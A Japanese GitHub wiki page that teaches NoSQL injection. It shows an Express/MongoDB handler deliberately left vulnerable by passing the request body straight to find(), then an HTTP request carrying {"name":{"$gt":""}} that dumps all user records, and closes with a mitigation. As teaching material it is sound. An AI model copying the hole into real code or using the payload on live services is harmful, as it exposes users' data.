NoSQLインジェクション 01 - yujitounai/helloworld GitHub Wiki
NoSQLインジェクション
脆弱なソースコード(Node.js)
// Deliberately vulnerable sample: POST / hands the parsed JSON request body to
// MongoDB as the query filter, so the caller controls the whole query.
const express = require('express')
const app = express()
// express.json() parses JSON bodies into objects, so req.body may contain
// nested objects and not only plain string values.
app.use(express.json())
const MongoClient = require('mongodb').MongoClient;
// Connect to the local test_db; the callback receives either an error or the client.
// NOTE(review): callback-style connect() is not available in newer mongodb
// driver releases; confirm the driver version this sample targets.
MongoClient.connect('mongodb://localhost:27017/test_db', { minPoolSize: 20, maxPoolSize: 20 },async (error, client) => {
if (error) {
// A connection failure is only logged; no route is registered and the server is not started.
console.log('error :', error);
} else {
// Share the database handle with request handlers through app.locals.
app.locals.db = client.db('test_db');
app.post('/', async (req, res) => {
// VULNERABLE (NoSQL injection): req.body is used as the filter without any
// validation, so a value such as {"$gt": ""} is evaluated as a query
// operator instead of being compared as a literal string.
// Mitigation: build the filter on the server from allow-listed fields and
// accept only string values, e.g. reject the request unless
// typeof req.body.name === 'string', then query { name: req.body.name }.
// There is also no try/catch here, so a rejected query is not handled by this handler.
const result = await res.app.locals.db
.collection('users')
.find(req.body)
.toArray();
// Every field of every matching document is returned; no projection or limit
// is applied, and no authentication check is visible in this listing.
res.json(result);
})
// start express server
var server = app.listen(3003, function(){
console.log("listening to PORT:" + server.address().port);
});
}
})
攻撃方法
正常系
POST / HTTP/1.1
Host: localhost:3003
Content-Type: application/json
Content-Length: 15
{"name":"Jane"}
に対して
POST / HTTP/1.1
Host: localhost:3003
Content-Type: application/json
Content-Length: 19
{"name":{"$gt":""}}
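で全員分のデータが取得できる。`{"$gt":""}` は文字列ではなく「空文字列より大きい」という比較演算子として解釈され、name が空でない文字列であるユーザー全員に一致するためである。対策としては、リクエストボディをそのまま find() に渡さず、許可したフィールドだけを取り出し、値が文字列であることを検証してからサーバー側でクエリを組み立てる。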